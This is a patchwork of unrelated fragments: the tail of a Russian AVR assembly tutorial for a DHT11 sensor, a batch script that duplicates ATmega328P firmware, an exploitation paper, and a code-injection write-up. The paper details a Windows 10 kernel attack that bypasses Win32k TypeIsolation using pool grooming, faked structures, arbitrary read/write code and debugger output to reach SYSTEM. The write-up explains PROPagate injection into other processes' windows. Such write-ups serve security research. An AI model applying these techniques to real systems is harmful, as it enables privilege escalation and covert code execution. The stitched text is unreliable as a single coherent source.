34002100ХХ, где 34 — это влажность целая часть, 00 — данные после запятой влажности, 21 — температура, 00 — опять данные после запятой температуры, ХХ — контрольная сумма. А нам надо бы вывести в терминал красиво типа «Temperature = 21.00». Так что для удобства, растащим данные по отдельным переменным.

Определения

H10:			.byte 1		; чиcло - целая часть влажность
H01:			.byte 1		; число - дробная часть влажность
T10:			.byte 1		; число - целая часть температура в C
T01:			.byte 1		; число - дробная часть температура

И сохраняем байты из BITS в нужные переменные

;============	GET HnT DATA =========================================
; из BITS вытаскиваем цифры H10...
; !!! чуть хакнули, потому что H10 и дальше... лежат последовательно в памяти

GET_HnT_DATA:	NOP

				LDI ZH, HIGH(BITS)
				LDI ZL, LOW(BITS)
				LDI XH, HIGH(H10)
				LDI XL, LOW(H10)
												; TODO - перевести на счетчик таки
				LD Tmp1, Z+			; Считали
				ST X+, Tmp1			; сохранили
				
				LD Tmp1, Z+			; Считали
				ST X+, Tmp1			; сохранили

				LD Tmp1, Z+			; Считали
				ST X+, Tmp1			; сохранили

				LD Tmp1, Z+			; Считали
				ST X+, Tmp1			; сохранили

				RET

После этого преобразуем цифры в коды ASCII, чтобы данные можно было нормально прочитать в терминале, добавляем названия данных, ну там «температура» из флеша и шлем в COM порт в терминал.

PuTTY с данными

Для того, чтобы это измерять температуру регулярно добавляем вечный цикл с задержкой порядка 1200 миллисекунд, поскольку datasheet DHT11 говорит, что не рекомендуется опрашивать датчик чаще чем 1 раз в секунду.

Основной цикл после этого выглядит примерно так:

;============	MAIN
			;!!! Главный вход
RESET:			NOP		

			; Internal Hardware Init
			CLI		; нам прерывания не нужны пока
				
			; stack init		
			LDI Tmp1, Low(RAMEND)
			OUT SPL, Tmp1
			LDI Tmp1, High(RAMEND)
			OUT SPH, Tmp1

			RCALL USART0_INIT

			; Init data
			RCALL COPY_STRINGS		; скопировали данные в RAM
			RCALL TEST_DATA			; подготовили тестовые данные

loop:				NOP						; крутимся в вечном цикле ....
				; External Hardware Init
				RCALL DHT_INIT
				; получили здесь подтверждение контроллера и надо в темпе читать биты
				RCALL READ_CYCLES
				; критичная ко времени секция завершилась...
				
				;Тест - отправить Cycles в USART		
				;RCALL TEST_CYCLES
				
				; получаем из посылки биты
				RCALL GET_BITS
				
				;Тест - отправить BITS в USART
				;RCALL TEST_BITS  
				
				; получаем из BITS цифровые данные
				RCALL GET_HnT_DATA
				
				;Тест - отправить 4 байта начиная с H10 в USART
				;RCALL TEST_H10_T01
				
				; подготовидли температуру и влажность в ASCII		
				RCALL HnT_ASCII_DATA_EX
				
				; Отправить готовую температуру (надпись и ASCII данные) в USART
				RCALL PRINT_TEMPER
				; Отправить готовую влажность (надпись и ASCII данные) в USART
				RCALL PRINT_HUMID
				; переведем строку дял красоты				
				RCALL SEND_CRLF
							
				RCALL DELAY_1200MS				;повторяем каждые 1.2 секунды 
				rjmp loop		; зациклились

Прошиваем, подключаем USB-TTL кабель (преобразователь)к компьютеру, запускаем терминал, выбираем правильный виртуальный COM порта и наслаждаемся нашим новым цифровым термометром. Для проверки можно погреть датчик в руке — у меня температура при этом растет, а влажность как ни странно уменьшается.

Ссылки по теме:
AVR Delay Calc
Как подключить Arduino для программирования в Atmel Studio 7
DHT11 Datasheet
ATmega DataSheet
Atmel AVR 8-bit Instruction Set
Atmel Studio
Код примера на github

AVR(Arduino) Firmware Duplicator

Windows script to make an exact copy of AVR (Arduino) firmware including the bootloader, user program, fuses and EEPROM.

Things used in this project

Hardware components: Atmel ATmega328P-PU

Story

Code

windows_read___copy__xp__vista_tested_.

Plain text

windows_read___copy__xp__vista_tested_.
REM
prompt $G
ECHO OFF
CLS
ECHO.
ECHO BATCH COPY ATMEGA328P-PU VIA ARDUINO-ISP ON com4
CD C:\Program Files\Arduino_105\hardware\tools\avr\bin
ECHO ENSURE MASTER CHIP IS IN THE READER
ECHO CTRL+C to abort OR PRESS Any key to begin copy...
ECHO.
pause >nul
ECHO Creating hexadecimal binary files of ATmel328P contents...
>stdout.log 2>&1 (
avrdude -c arduino -P com4 -p ATMEGA328P -b 19200 -U flash:r:%temp%\backup_flash.hex:i
ECHO flash has been sAVED to backup_flash.hex
avrdude -c arduino -P com4 -p ATMEGA328P -b 19200 -U eeprom:r:%temp%\backup_eeprom.hex:i
ECHO eeprom has been SAVED to backup_eerpom.hex
avrdude -c arduino -P com4 -p ATMEGA328P -b 19200 -U hfuse:r:%temp%\backup_hfuse.hex:i
ECHO hfuse has been SAVED to backup_hfuse.hex
avrdude -c arduino -P com4 -p ATMEGA328P -b 19200 -U lfuse:r:%temp%\backup_lfuse.hex:i
ECHO lfuse has been SAVED to backup_lfuse.hex
avrdude -c arduino -P com4 -p ATMEGA328P -b 19200 -U efuse:r:%temp%\backup_efuse.hex:i
ECHO efuse has been SAVED to backup_efuse.hex
)
ECHO Hexadecimal files created.
ECHO.
CD C:\Program Files\Arduino_105\hardware\tools\avr\bin
ECHO INSERT THE NEW CHIP now!
ECHO PRESS Any key to write new chip...
pause >nul
REM Note that the path cannot contain the drive letter "C:" so you cannot use %temp% as previously
REM Reference:http://savannah.nongnu.org/bugs/index.php Bug report #39230
REM.
>>stdout.log 2>&1 (
avrdude -c arduino -P com4 -p ATMEGA328P -b 19200 -U flash:w:\Users\owner\AppData\Local\Temp\backup_flash.hex
ECHO backup_flash.hex WRITTEN
avrdude -c arduino -P com4 -p ATMEGA328P -b 19200 -U eeprom:w:\Users\owner\AppData\Local\Temp\backup_eeprom.hex
ECHO backup_eeprom.hex WRITTEN
avrdude -c arduino -P com4 -p ATMEGA328P -b 19200 -U hfuse:w:\Users\owner\AppData\Local\Temp\backup_hfuse.hex
ECHO hfuse WRITTEN
avrdude -c arduino -P com4 -p ATMEGA328P -b 19200 -U lfuse:w:\Users\owner\AppData\Local\Temp\backup_lfuse.hex
ECHO lfuse WRITTEN
avrdude -c arduino -P com4 -p ATMEGA328P -b 19200 -U efuse:w:\Users\owner\AppData\Local\Temp\backup_efuse.hex
ECHO efuse WRITTEN ... this may change from 05 to 07 with BOD being disabled by AVRDUDE
)
ECHO.
ECHO Chip duplication and verification is complete.
ECHO Starting Notepad editor to display log file.
start notepad C:\Program Files\Arduino_105\hardware\tools\avr\bin\stdout.log
ECHO.
ECHO Press Any key to close this window...
pause >nul

 

Save and Reborn GDI data-only attack from Win32k TypeIsolation

1 Background

In recent years, the exploit of GDI objects to complete arbitrary memory address R/W in kernel exploitation has become more and more useful. In many types of vulnerabilityes such as pool overflow, arbitrary writes, and out-of-bound write, use after free and double free, you can use GDI objects to read and write arbitrary memory. We call this GDI data-only attack.

Microsoft introduced the win32k type isolation after the Windows 10 build 1709 release to mitigate GDI data-only attack in kernel exploitation. I discovered a mistake in Win32k TypeIsolation when I reverse win32kbase.sys. It have resulted GDI data-only attack worked again in certain common vulnerabilities. In this paper, I will share this new attack scenario.

Debug environment:

OS:

Windows 10 rs3 16299.371

FILE:

Win32kbase.sys 10.0.16299.371

2 GDI data-only attack

GDI data-only attack is one of the common methods which used in kernel exploitation. Modify GDI object member-variables by common vulnerabilities, you can use the GDI API in win32k to complete arbitrary memory read and write. At present, two GDI objects commonly used in GDI data-only attacks are Bitmap and Palette. An important structure of Bitmap is:


Typedef struct _SURFOBJ {

DHSURF dhsurf;

HSURF hsurf;

DHPDEV dhpdev;

HDEV hdev;

SIZEL sizlBitmap;

ULONG cjBits;

PVOID pvBits;

PVOID pvScan0;

LONG lDelta;

ULONG iUniq;

ULONG iBitmapFormat;

USHORT iType;

USHORT fjBitmap;

} SURFOBJ, *PSURFOBJ;

An important structure of Palette is:


Typedef struct _PALETTE64

{

BASEOBJECT64 BaseObject;

FLONG flPal;

ULONG32 cEntries;

ULONG32 ulTime;

HDC hdcHead;

ULONG64 hSelected;

ULONG64 cRefhpal;

ULONG64 cRefRegular;

ULONG64 ptransFore;

ULONG64 ptransCurrent;

ULONG64 ptransOld;

ULONG32 unk_038;

ULONG64 pfnGetNearest;

ULONG64 pfnGetMatch;

ULONG64 ulRGBTime;

ULONG64 pRGBXlate;

PALETTEENTRY *pFirstColor;

Struct _PALETTE *ppalThis;

PALETTEENTRY apalColors[3];

}

In the kernel structure of Bitmap and Palette, two important member-variables related to GDI data-only attack are Bitmap->pvScan0 and Palette->pFirstColor. Two member-variables point to Bitmap and Palette’s data field, and you can read or write data from data field through the GDI APIs. As long as we modify two member-variables to any memory address by triggering a vulnerability, we can use GetBitmapBits/SetBitmapBits or GetPaletteEntries/SetPaletteEntries to read and write arbitrary memory address.

About using the Bitmap and Palette to complete the GDI data-only attack Now that there are many related technical papers on the Internet, and it is not the focus of this paper, there will be no more deeply sharing. The relevant information can refer to the fifth part.

3 Win32k TypeIsolation

The exploit of GDI data-only attack greatly reduces the difficulty of kernel exploitation and can be used in most common types of vulnerabilities. Microsoft has added a new mitigation after Windows 10 rs3 build 1709 —- Win32k Typeisolation, which manages the GDI objects through a doubly-linked list, and separates the head of the GDI object from the data field. This is not only mitigate the exploit of pool fengshui which create a predictable pool and uses a GDI object to occupy the pool hole and modify member-variables by vulnerabilities. but also mitigate attack scenario which modifies other member-variables of GDI object header to increase the controllable range of the data field, because the head and data field is no longer adjacent.

About win32k typeisolation mechanism can refer to the following figure:

Here I will explain the important parts of the mechanism of win32k typeisolation. The detailed operation mechanism of win32k typeisolation, including the allocation, and release of GDI object, can be referred to in the fifth part.

In win32k typeisolation, GDI object is managed uniformly through the CSectionEntry doubly linked list. The view field points to a 0x28000 memory space, and the head of the GDI object is managed here. The view field is managed by view array, and the array size is 0x1000. When assigning to a GDI object, RTL_BITMAP is used as an important basis for assigning a GDI object to a specified view field.

In CSectionEntry, bitmap_allocator points to CSectionBitmapAllocator, and xored_view, xor_key, xored_rtl_bitmap are stored in CSectionBitmapAllocator, where xored_view ^ xor_key points to the view field and xored_rtl_btimap ^ xor_key points to RTL_BITMAP.

In RTL_BITMAP, bitmap_buffer_ptr points to BitmapBuffer,and BitmapBuffer is used to record the status of the view field, which is 0 for idle and 1 for in use. When applying for a GDI object, it starts traversing the CSectionEntry list through win32kbase!gpTypeIsolation and checks whether the current view field contains a free memory by CSectionBitmapAllocator. If there is a free memory, a new GDI object header will be placed in the view field.

I did some research in the reverse engineering of the implementation of GDI object allocation and release about the CTypeIsolation class and the CSectionEntry class, and then I found a mistake. TypeIsolation traverses the CSectionEntry doubly linked list, uses the CSectionBitmapAllocator to determine the state of the view field, and manages the GDI object SURFACE which stored in the view field, but does not check the validity of CSectionEntry->view and CSectionEntry->bitmap_allocator pointers, that is to say if we can construct a fake view and fake bitmap_allocator, and we can use the vulnerability to modify CSectionEntry->view and CSectionEntry->bitmap_allocator to point to fake struct, we can re-use GDI object to complete the data-only attack.

4 Save and reborn gdi data-only attack!

In this section, I would like to share the idea of ​​this attack scenario. HEVD is a practice driver developed by Hacksysteam that has typical kernel vulnerabilities. There is an Arbitrary Write vulnerability in HEVD. We use this vulnerability as example to share my attack scenario.

Attack scenario:

First look at the allocation of CSectionEntry, CSectionEntry will allocate 0x40 size session paged pool, CSectionEntry allocate pool memory implementation in NSInstrumentation::CSectionEntry::Create().


.text:00000001C002AC8A mov edx, 20h ; NumberOfBytes

.text:00000001C002AC8F mov r8d, 6F736955h ; Tag

.text:00000001C002AC95 lea ecx, [rdx+1] ; PoolType

.text:00000001C002AC98 call cs:__imp_ExAllocatePoolWithTag //Allocate 0x40 session paged pool

In other words, we can still use the pool fengshui to create a predictable session paged pool hole and it will be occupied with CSectionEntry. Therefore, in the exploit scenario of HEVD Arbitrary write, we use the tagWND to create a stable pool hole. , and use the HMValidateHandle to leak tagWND kernel object address. Because the current vulnerability instance is an arbitrary write vulnerability, if we can reveal the address of the kernel object, it will facilitate our understanding of this attack scenario, of course, in many attack scenarios, we only need to use pool fengshui to create a predictable pool.


Kd> g//make a stable pool hole by using tagWND

Break instruction exception - code 80000003 (first chance)

0033:00007ff6`89a61829 cc int 3

Kd> p

0033:00007ff6`89a6182a 488b842410010000 mov rax,qword ptr [rsp+110h]

Kd> p

0033:00007ff6`89a61832 4839842400010000 cmp qword ptr [rsp+100h],rax

Kd> r rax

Rax=ffff862e827ca220

Kd> !pool ffff862e827ca220

Pool page ffff862e827ca220 region is Unknown

Ffff862e827ca000 size: 150 previous size: 0 (Allocated) Gh04

Ffff862e827ca150 size: 10 previous size: 150 (Free) Free

Ffff862e827ca160 size: b0 previous size: 10 (Free ) Uscu

*ffff862e827ca210 size: 40 previous size: b0 (Allocated) *Ustx Process: ffffd40acb28c580

Pooltag Ustx : USERTAG_TEXT, Binary : win32k!NtUserDrawCaptionTemp

Ffff862e827ca250 size: e0 previous size: 40 (Allocated) Gla8

Ffff862e827ca330 size: e0 previous size: e0 (Allocated) Gla8```

0xffff862e827ca220 is a stable session paged pool hole, and 0xffff862e827ca220 will be released later, in a free state.


Kd> p

0033:00007ff7`abc21787 488b842498000000 mov rax,qword ptr [rsp+98h]

Kd> p

0033:00007ff7`abc2178f 48398424a0000000 cmp qword ptr [rsp+0A0h],rax

Kd> !pool ffff862e827ca220

Pool page ffff862e827ca220 region is Unknown

Ffff862e827ca000 size: 150 previous size: 0 (Allocated) Gh04

Ffff862e827ca150 size: 10 previous size: 150 (Free) Free

Ffff862e827ca160 size: b0 previous size: 10 (Free) Uscu

*ffff862e827ca210 size: 40 previous size: b0 (Free ) *Ustx

Pooltag Ustx : USERTAG_TEXT, Binary : win32k!NtUserDrawCaptionTemp

Ffff862e827ca250 size: e0 previous size: 40 (Allocated) Gla8

Ffff862e827ca330 size: e0 previous size: e0 (Allocated) Gla8

Now we need to create the CSecitionEntry to occupy 0xffff862e827ca220. This requires the use of a feature of TypeIsolation. As mentioned in the second section, when the GDI object is requested, it will traverse the CSectionEntry and determine whether there is any free in the view field, if the view field of the CSectionEntry is full, the traversal will continue to the next CSectionEntry, but if CTypeIsolation doubly linked list, all the view fields of the CSectionEntrys are full, then NSInstrumentation::CSectionEntry::Create is invoked to create a new CSectionEntry.

Therefore, we allocate a large number of GDI objects after we have finished creating the pool hole to fill up all the CSectionEntry’s view fields to ensure that a new CSectionEntry is created and occupy a pool hole of size 0x40.


Kd> g//create a large number of GDI objects, 0xffff862e827ca220 is occupied by CSectionEntry

Kd> !pool ffff862e827ca220

Pool page ffff862e827ca220 region is Unknown

Ffff862e827ca000 size: 150 previous size: 0 (Allocated) Gh04

Ffff862e827ca150 size: 10 previous size: 150 (Free) Free

Ffff862e827ca160 size: b0 previous size: 10 (Free) Uscu

*ffff862e827ca210 size: 40 previous size: b0 (Allocated) *Uiso

Pooltag Uiso : USERTAG_ISOHEAP, Binary : win32k!TypeIsolation::Create

Ffff862e827ca250 size: e0 previous size: 40 (Allocated) Gla8 ffff86b442563150 size:

Next we need to construct the fake CSectionEntry->view and fake CSectionEntry->bitmap_allocator and use the Arbitrary Write to modify the member-variable pointer in the CSectionEntry in the session paged pool hole to point to the fake struct we constructed.

The view field of the new CSectionEntry that was created when we allocate a large number of GDI objects may already be full or partially full by SURFACEs. If we construct the fake struct to construct the view field as empty, then we can deceive TypeIsolation that GDI object will place SURFACE in a known location.

We use VirtualAllocEx to allocate the memory in the userspace to store the fake struct, and we set the userspace memory property to READWRITE.


Kd> dq 1e0000//fake pushlock

00000000`001e0000 00000000`00000000 00000000`0000006c

Kd> dq 1f0000//fake view

00000000`001f0000 00000000`00000000 00000000`00000000

00000000`001f0010 00000000`00000000 00000000`00000000

Kd> dq 190000//fake RTL_BITMAP

00000000`00190000 00000000`000000f0 00000000`00190010

00000000`00190010 00000000`00000000 00000000`00000000

Kd> dq 1c0000//fake CSectionBitmapAllocator

00000000`001c0000 00000000`001e0000 deadbeef`deb2b33f

00000000`001c0010 deadbeef`deadb33f deadbeef`deb4b33f

00000000`001c0020 00000001`00000001 00000001`00000000

Among them, 0x1f0000 points to the view field, 0x1c0000 points to CSectionBitmapAllocator, and the fake view field is used to store the GDI object. The structure of CSectionBitmapAllocator needs thoughtful construction because we need to use it to deceive the typeisolation that the CSectionEntry we control is a free view item.


Typedef struct _CSECTIONBITMAPALLOCATOR {

PVOID pushlock; // + 0x00

ULONG64 xored_view; // + 0x08

ULONG64 xor_key; // + 0x10

ULONG64 xored_rtl_bitmap; // + 0x18

ULONG bitmap_hint_index; // + 0x20

ULONG num_commited_views; // + 0x24

} CSECTIONBITMAPALLOCATOR, *PCSECTIONBITMAPALLOCATOR;

The above CSectionBitmapAllocator structure compares with 0x1c0000 structure, and I defined xor_key as 0xdeadbeefdeadb33f, as long as the xor_key ^ xor_view and xor_key ^ xor_rtl_bitmap operation point to the view field and RTL_BITMAP. In the debugging I found that the pushlock must point to a valid structure pointer, otherwise it will trigger BUGCHECK, so I allocate memory 0x1e0000 to store pushlock content.

As described in the second section, bitmap_hint_index is used as a condition to quickly index in the RTL_BITMAP, so this value also needs to be set to 0x00 to indicate the index in RTL_BITMAP. In the same way we look at the structure of RTL_BITMAP.


Typedef struct _RTL_BITMAP {

ULONG64 size; // + 0x00

PVOID bitmap_buffer; // + 0x08

} RTL_BITMAP, *PRTL_BITMAP;

Kd> dyb fffff322401b90b0

76543210 76543210 76543210 76543210

-------- -------- -------- --------

Fffff322`401b90b0 11110000 00000000 00000000 00000000 f0 00 00 00

Fffff322`401b90b4 00000000 00000000 00000000 00000000 00 00 00 00

Fffff322`401b90b8 11000000 10010000 00011011 01000000 c0 90 1b 40

Fffff322`401b90bc 00100010 11110011 11111111 11111111 22 f3 ff ff

Fffff322`401b90c0 11111111 11111111 11111111 11111111 ff ff ff ff

Fffff322`401b90c4 11111111 11111111 11111111 11111111 ff ff ff ff

Fffff322`401b90c8 11111111 11111111 11111111 11111111 ff ff ff ff

Fffff322`401b90cc 11111111 11111111 11111111 11111111 ff ff ff ff

Kd> dq fffff322401b90b0

Fffff322`401b90b0 00000000`000000f0 fffff322`401b90c0//ptr to rtl_bitmap buffer

Fffff322`401b90c0 ffffffff`ffffffff ffffffff`ffffffff

Fffff322`401b90d0 ffffffff`ffffffff

Here I select a valid RTL_BITMAP as a template, where the first member-variable represents the RTL_BITMAP size, the second member-variable points to the bitmap_buffer, and the immediately adjacent bitmap_buffer represents the state of the view field in bits. To deceive typeisolation, we will all of them are set to 0, indicating that the view field of the current CSectionEntry item is all idle, referring to the 0x190000 fake RTL_BITMAP structure.

Next, we only need to modify the CSectionEntry view and CSectionBitmapAllocator pointer through the HEVD’s Arbitrary write vulnerability.


Kd> dq ffff862e827ca220//before trigger

Ffff862e`827ca220 ffff862e`827cf4f0 ffff862e`827ef300

Ffff862e`827ca230 ffffc383`08613880 ffff862e`84780000

Ffff862e`827ca240 ffff862e`827f33c0 00000000`00000000

Kd> g / / trigger vulnerability, CSectionEntry-> view and CSectionEntry-> bitmap_allocator is modified

Break instruction exception - code 80000003 (first chance)

0033:00007ff7`abc21e35 cc int 3

Kd> dq ffff862e827ca220

Ffff862e`827ca220 ffff862e`827cf4f0 ffff862e`827ef300

Ffff862e`827ca230 ffffc383`08613880 00000000`001f0000

Ffff862e`827ca240 00000000`001c0000 00000000`00000000

Next, we normally allocate a GDI object, call CreateBitmap to create a bitmap object, and then observe the state of the view field.


Kd> g

Break instruction exception - code 80000003 (first chance)

0033:00007ff7`abc21ec8 cc int 3

Kd> dq 1f0280

00000000`001f0280 00000000`00051a2e 00000000`00000000

00000000`001f0290 ffffd40a`cc9fd700 00000000`00000000

00000000`001f02a0 00000000`00051a2e 00000000`00000000

00000000`001f02b0 00000000`00000000 00000002`00000040

00000000`001f02c0 00000000`00000080 ffff862e`8277da30

00000000`001f02d0 ffff862e`8277da30 00003f02`00000040

00000000`001f02e0 00010000`00000003 00000000`00000000

00000000`001f02f0 00000000`04800200 00000000`00000000

You can see that the bitmap kernel object is placed in the fake view field. We can read the bitmap kernel object directly from the userspace. Next, we only need to directly modify the pvScan0 of the bitmap kernel object stored in the userspace, and then call the GetBitmapBits/SetBitmapBits to complete any memory address read and write.

Summarize the exploit process:

Fix for full exploit:

In the course of completing the exploit, I discovered that BSOD was generated some time, which greatly reduced the stability of the GDI data-only attack. For example,


Kd> !analyze -v

************************************************** *****************************

* *

* Bugcheck Analysis *

* *

************************************************** *****************************




SYSTEM_SERVICE_EXCEPTION (3b)

An exception happened while performing a system service routine.

Arguments:

Arg1: 00000000c0000005, Exception code that caused the bugcheck

Arg2: ffffd7d895bd9847, Address of the instruction which caused the bugcheck

Arg3: ffff8c8f89e98cf0, Address of the context record for the exception that caused the bugcheck

Arg4: 0000000000000000, zero.




Debugging Details:

------------------







OVERLAPPED_MODULE: Address regions for 'dxgmms1' and 'dump_storport.sys' overlap




EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - 0x%08lx




FAULTING_IP:

Win32kbase!NSInstrumentation::CTypeIsolation&lt;163840,640>::AllocateType+47

Ffffd7d8`95bd9847 488b1e mov rbx, qword ptr [rsi]




CONTEXT: ffff8c8f89e98cf0 -- (.cxr 0xffff8c8f89e98cf0)

.cxr 0xffff8c8f89e98cf0

Rax=ffffdb0039e7c080 rbx=ffffd7a7424e4e00 rcx=ffffdb0039e7c080

Rdx=ffffd7a7424e4e00 rsi=00000000001e0000 rdi=ffffd7a740000660

Rip=ffffd7d895bd9847 rsp=ffff8c8f89e996e0 rbp=0000000000000000

R8=ffff8c8f89e996b8 r9=0000000000000001 r10=7ffffffffffffffc

R11=0000000000000027 r12=00000000000000ea r13=ffffd7a740000680

R14=ffffd7a7424dca70 r15=0000000000000027

Iopl=0 nv up ei pl nz na po nc

Cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00010206

Win32kbase!NSInstrumentation::CTypeIsolation&lt;163840,640>::AllocateType+0x47:

Ffffd7d8`95bd9847 488b1e mov rbx, qword ptr [rsi] ds:002b:00000000`001e0000=????????????????

After many tracking, I discovered that the main reason for BSOD is that the fake struct we created when using VirtualAllocEx is located in the process space of our current process. This space is not shared by other processes, that is, if we modify the view field through a vulnerability. After the pointer to the CSectionBitmapAllocator, when other processes create the GDI object, it will also traverse the CSecitionEntry. When traversing to the CSectionEntry we modify through the vulnerability, it will generate BSoD because the address space of the process is invalid, so here I did my first fix when the vulnerability was triggered finish.


DWORD64 fix_bitmapbits1 = 0xffffffffffffffff;

DWORD64 fix_bitmapbits2 = 0xffffffffffff;

DWORD64 fix_number = 0x2800000000;

CopyMemory((void *)(fakertl_bitmap + 0x10), &fix_bitmapbits1, 0x8);

CopyMemory((void *)(fakertl_bitmap + 0x18), &fix_bitmapbits1, 0x8);

CopyMemory((void *)(fakertl_bitmap + 0x20), &fix_bitmapbits1, 0x8);

CopyMemory((void *)(fakertl_bitmap + 0x28), &fix_bitmapbits2, 0x8);

CopyMemory((void *)(fakeallocator + 0x20), &fix_number, 0x8);

In the first fix, I modified the bitmap_hint_index and the rtl_bitmap to deceive the typeisolation when traverse the CSectionEntry and think that the view field of the fake CSectionEntry is currently full and will skip this CSectionEntry.

We know that the current CSectionEntry has been modified by us, so even if we end the exploit exit process, the CSectionEntry will still be part of the CTypeIsolation doubly linked list, and when our process exits, The current process space allocated by VirtualAllocEx will be released. This will lead to a lot of unknown errors. We have already had the ability to read and write at any address. So I did my second fix.


ArbitraryRead(bitmap, fakeview + 0x280 + 0x48, CSectionEntryKernelAddress + 0x8, (BYTE *)&CSectionPrevious, sizeof(DWORD64));

ArbitraryRead(bitmap, fakeview + 0x280 + 0x48, CSectionEntryKernelAddress, (BYTE *)&CSectionNext, sizeof(DWORD64));

LogMessage(L_INFO, L"Current CSectionEntry->previous: 0x%p", CSePrevious);

LogMessage(L_INFO, L"Current CSectionEntry->next: 0x%p", CSectionNext);

ArbitraryWrite(bitmap, fakeview + 0x280 + 0x48, CSectionNext + 0x8, (BYTE *)&CSectionPrevious, sizeof(DWORD64));

ArbitraryWrite(bitmap, fakeview + 0x280 + 0x48, CSectionPrevious, (BYTE *)&CSectionNext, sizeof(DWORD64));

In the second fix, I obtained CSectionEntry->previous and CSectionEntry->next, which unlinks the current CSectionEntry so that when the GDI object allocates traversal CSectionEntry, it will  deal with fake CSectionEntry no longer.

After completing the two fixes, you can successfully use GDI data-only attack to complete any memory address read and write. Here, I directly obtained the SYSTEM permissions for the latest version of Windows10 rs3, but once again when the process completely exits, it triggers BSoD. After the analysis, I found that this BSoD is due to the unlink after, the GDI handle is still stored in the GDI handle table, then it will find the corresponding kernel object in CSectionEntry and free away, and we store the bitmap kernel object CSectionEntry has been unlink, Caused the occurrence of BSoD.

The problem occurs in NtGdiCloseProcess, which is responsible for releasing the GDI object of the current process. The call chain associated with SURFACE is as follows


0e ffff858c`8ef77300 ffff842e`52a57244 win32kbase!SURFACE::bDeleteSurface+0x7ef

0f ffff858c`8ef774d0 ffff842e`52a1303f win32kbase!SURFREF::bDeleteSurface+0x14

10 ffff858c`8ef77500 ffff842e`52a0cbef win32kbase!vCleanupSurfaces+0x87

11 ffff858c`8ef77530 ffff842e`52a0c804 win32kbase!NtGdiCloseProcess+0x11f

bDeleteSurface is responsible for releasing the SURFACE kernel object in the GDI handle table. We need to find the HBITMAP which stored in the fake view in the GDI handle table, and set it to 0x0. This will skip the subsequent free processing in bDeleteSurface. Then call HmgNextOwned to release the next GDI object. The key code for finding the location of HBITMAP in the GDI handle table is in HmgSharedLockCheck. The key code is as follows:


V4 = *(_QWORD *)(*(_QWORD *)(**(_QWORD **)(v10 + 24) + 8 *((unsigned __int64)(unsigned int)v6 >> 8)) + 16i64 * (unsigned __int8 )v6 + 8);

Here I have restored a complete calculation method to find the bitmap object:


*(*(*(*(*win32kbase!gpHandleManager+10)+8)+18)+(hbitmap&0xffff>>8)*8)+hbitmap&0xff*2*8

It is worth mentioning here is the need to leak the base address of win32kbase.sys, in the case of Low IL, we need vulnerability to leak info. And I use NtQuerySystemInformation in Medium IL to leak win32kbase.sys base address to calculate the gpHandleManager address, after Find the position of the target bitmap object in the GDI handle table in the fake view, and set it to 0x0. Finally complete the full exploit.

Now that the exploit of the kernel is getting harder and harder, a full exploitation often requires the support of other vulnerabilities, such as the info leak. Compared to the oob writes, uaf, double free, and write-what-where, the pool overflow is more complicated with this scenario, because it involves CSectionEntry->previous and CSectionEntry->next problems, but it is not impossible to use this scenario in pool overflow.

If you have any questions, welcome to discuss with me. Thank you!

5 Reference

https://www.coresecurity.com/blog/abusing-gdi-for-ring0-exploit-primitives

https://media.defcon.org/DEF%20CON%2025/DEF%20CON%2025%20presentations/5A1F/DEFCON-25-5A1F-Demystifying-Kernel-Exploitation-By-Abusing-GDI-Objects.pdf

https://blog.quarkslab.com/reverse-engineering-the-win32k-type-isolation-mitigation.html

https://github.com/sam-b/windows_kernel_address_leaks

New code injection trick named — PROPagate code injection technique

ROPagate code injection technique

@Hexacorn discussed in late 2017 a new code injection technique, which involves hooking existing callback functions in a Window subclass structure. Exploiting this legitimate functionality of windows for malicious purposes will not likely surprise some developers already familiar with hooking existing callback functions in a process. However, it’s still a relatively new technique for many to misuse for code injection, and we’ll likely see it used more and more in future.

For all the details on research conducted by Adam, I suggest the following posts.

 

PROPagate — a new code injection trick

|=======================================================|

Executing code inside a different process space is typically achieved via an injected DLL /system-wide hooks, sideloading, etc./, executing remote threads, APCs, intercepting and modifying the thread context of remote threads, etc. Then there is Gapz/Powerloader code injection (a.k.a. EWMI), AtomBombing, and mapping/unmapping trick with the NtClose patch.

There is one more.

Remember Shatter attacks?

I believe that Gapz trick was created as an attempt to bypass what has been mitigated by the User Interface Privilege Isolation (UIPI). Interestingly, there is actually more than one way to do it, and the trick that I am going to describe below is a much cleaner variant of it – it doesn’t even need any ROP.

There is a class of windows always present on the system that use window subclassing. Window subclassing is just a fancy name for hooking, because during the subclassing process an old window procedure is preserved while the new one is being assigned to the window. The new one then intercepts all the window messages, does whatever it has to do, and then calls the old one.

The ‘native’ window subclassing is done using the SetWindowSubclass API.

When a window is subclassed it gains a new property stored inside its internal structures and with a name depending on a version of comctl32.dll:

  • UxSubclassInfo – version 6.x
  • CC32SubclassInfo – version 5.x

Looking at properties of Windows Explorer child windows we can see that plenty of them use this particular subclassing property:

So do other Windows applications – pretty much any program that is leveraging standard windows controls can be of interest, including say… OllyDbg:When the SetWindowSubclass is called it is using SetProp API to set one of these two properties (UxSubclassInfo, or CC32SubclassInfo) to point to an area in memory where the old function pointer will be stored. When the new message routine is called, it will then call GetProp API for the given window and once its old procedure address is retrieved – it is executed.

Coming back for a moment to the aforementioned shattering attacks. We can’t use SetWindowLong or SetClassLong (or their newer SetWindowLongPtr and SetClassLongPtr alternatives) any longer to set the address of the window procedure for windows belonging to the other processes (via GWL_WNDPROC or GCL_WNDPROC). However, the SetProp function is not affected by this limitation. When it comes to the process at the lower of equal  integrity level the Microsoft documentation says:

SetProp is subject to the restrictions of User Interface Privilege Isolation (UIPI). A process can only call this function on a window belonging to a process of lesser or equal integrity level. When UIPI blocks property changes, GetLastError will return 5.

So, if we talk about other user applications in the same session – there is plenty of them and we can modify their windows’ properties freely!

I guess you know by now where it is heading:

  • We can freely modify the property of a window belonging to another process.
  • We also know some properties point to memory region that store an old address of a procedure of the subclassed window.
  • The routine that address points to will be at some stage executed.

All we need is a structure that UxSubclassInfo/CC32SubclassInfo properties are using. This is actually pretty easy – you can check what SetProp is doing for these subclassed windows. You will quickly realize that the old procedure is stored at the offset 0x14 from the beginning of that memory region (the structure is a bit more complex as it may contain a number of callbacks, but the first one is at 0x14).

So, injecting a small buffer into a target process, ensuring the expected structure is properly filled-in and and pointing to the payload and then changing the respective window property will ensure the payload is executed next time the message is received by the window (this can be enforced by sending a message).

